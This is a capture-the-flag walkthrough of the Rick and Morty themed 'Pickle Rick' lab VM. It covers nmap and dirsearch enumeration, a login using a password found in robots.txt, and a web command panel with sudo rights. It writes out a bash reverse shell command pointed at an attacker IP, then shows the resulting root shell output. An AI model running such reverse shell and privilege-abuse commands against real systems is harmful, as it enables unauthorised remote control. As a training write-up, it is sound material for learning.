Pickle Rick

Rick and Morty themed VM with a web server.

This room can be found HERE.

Nmap

First, we launch an nmap scan.

nmap -sV -sC -p- $IP --min-rate=5000

nmap results

...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ca:b4:fb:d9:51:93:12:59:8b:a8:6f:8a:80:47:57:77 (RSA)
|   256 b6:ac:c4:48:03:69:78:3b:c0:19:96:4f:11:6e:e6:88 (ECDSA)
|_  256 e3:3b:1b:8e:a6:ac:f5:ac:19:cb:bc:e5:16:4f:82:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that ports 22 & 80 are open, let's checkout port 80 first.

Checking out the website

This seems to be the home page, let's check the source of the page. Sure enough, there is something interesting here, a username:

Enumeration

Since this is a web server, let's enumerate the pages on this. I'll use dirsearch for this but gobuster can also be used.

dirsearch -u http://$IP

dirsearch results

...
200   588B   http://10.10.72.200/assets/
200   455B   http://10.10.72.200/login.php
200    17B   http://10.10.72.200/robots.txt
...

It seems we have a login page, but let's check the robots.txt file. In this file we only have the text "Wubbalubbadubdub". Maybe this is the password for the login page. Let's check it out now.

Let's try the username we got on the home page and the "Wubbalubbadubdub" string we got on the robots.txt file.

Sure enough, we are in!

Trying out commands

It seems we have a command panel where we can input commands. Let's try a simple ls first.

It seems we have our first flag! Let's cat it so we get the content.

We can see that the cat command is disabled, but we can easily work around this by using another command, such as less. First down, two to go. 🚩

Let's try some other commands, see what we can do. First let's find out who we are by running whoami.

Now let's see if we can do anything as sudo by running sudo -l.

Reverse shell

Okay! we can pretty much do anything, which means we can launch a reverse shell with root! Let's create the reverse shell and add execution privileges first (Reverse Shell Cheat Sheet). I'll type these commands into the command panel:

sudo echo "bash -i >& /dev/tcp/10.8.239.221/4444 0>&1" | sudo tee hello.sh
sudo chmod +x hello.sh

On my Kali machine, I'll launch ncat with nc -nlvp 4444. Then we can initiate the shell by typing sudo bash hello.sh into the command panel.

reverse shell initiation

listening on [any] 4444 ...
connect to [10.8.239.221] from (UNKNOWN) [10.10.72.200] 57232
bash: cannot set terminal process group (1347): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-72-200:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)

And so we have a root shell!

Finding the remaining flags

Now let's search for the remaining flags. Let's check the /home directory first.

root@ip-10-10-72-200:/home# ls
rick
ubuntu

We can check Rick's home folder if there is anything interesting.

root@ip-10-10-72-200:/home# ls rick
second ingredients

Second flag done! 🚩

Something tells me the third flag is in the /root directory, so let's check it out.

root@ip-10-10-72-200:/home# cd /root
root@ip-10-10-72-200:~# ls
3rd.txt
snap

And there we go! We have all the flags 🚩

PreviousSimple CTF NextLazy Admin

Last updated 2 years ago

hashtagNmap

hashtagChecking out the website

hashtagEnumeration

hashtagLogin

hashtagTrying out commands

hashtagReverse shell

hashtagFinding the remaining flags